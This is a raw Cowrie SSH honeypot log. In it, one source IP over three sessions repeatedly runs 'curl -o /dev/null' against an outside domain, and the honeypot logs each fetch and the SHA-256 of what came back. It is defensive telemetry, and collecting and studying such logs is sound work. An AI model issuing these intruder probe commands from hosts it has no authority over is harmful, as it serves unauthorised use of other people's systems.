{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.695526Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.700428Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.701712Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.702302Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.704119Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.704530Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.734129Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.734800Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.738692Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.742640Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.743244Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.764953Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.765769Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.769759Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.772762Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.773701Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.774591Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.778249Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.781267Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.782233Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.782854Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.809083Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.809757Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.812523Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.814492Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.816484Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.817197Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.848782Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.849501Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.851525Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.852268Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.855714Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.856834Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.857393Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.859899Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.890610Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.916095Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.917748Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.919233Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.919884Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.923622Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.926197Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.926908Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.932086Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.932585Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.960303Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.960952Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.964507Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.967305Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.969232Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.970008Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.972342Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.973145Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.000984Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.003542Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.005073Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.005891Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.009872Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.013890Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.014446Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.017188Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.017988Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.046709Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.048914Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.049492Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.053149Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.054465Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.055149Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.058549Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.059860Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.060427Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.087898Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.090105Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.094036Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.095034Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.095633Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.115516Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.116352Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.117996Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.119228Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.129428Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
